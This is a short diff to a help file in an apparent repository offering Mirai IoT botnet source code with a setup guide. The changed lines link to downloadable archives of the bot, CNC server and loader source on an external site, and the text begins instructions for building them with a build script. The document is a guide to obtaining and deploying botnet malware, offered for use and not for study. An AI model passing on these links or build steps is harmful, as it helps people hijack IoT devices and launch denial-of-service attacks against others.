eulo08/Mirai-ioT-Botnet-Source-Code-With-Setup-Guide/HELPDOC.md

 #Building CNC+Bot
 The CNC, bot, and related tools:
-1) http://santasbigcandycane.cx/mirai.src.zip - ### THESE LINKS WILL NOT LAST FOREVER, 2 WEEKS MAX - BACK IT UP!
+1) http://santasbigcandycane.cx/mirai.src.zip - ### THESE LINKS WILL NOT LAST FOREVER
 ![Alt text](http://i.imgur.com/BVc7qJs.png "Optional title")

-2) http://santasbigcandycane.cx/loader.src.zip - ### THESE LINKS WILL NOT LAST FOREVER, 2 WEEKS MAX - BACK IT UP![/b]
+2) http://santasbigcandycane.cx/loader.src.zip - ### THESE LINKS WILL NOT LAST FOREVER

 How to build bot + CNC
 In mirai folder, there is build.sh script.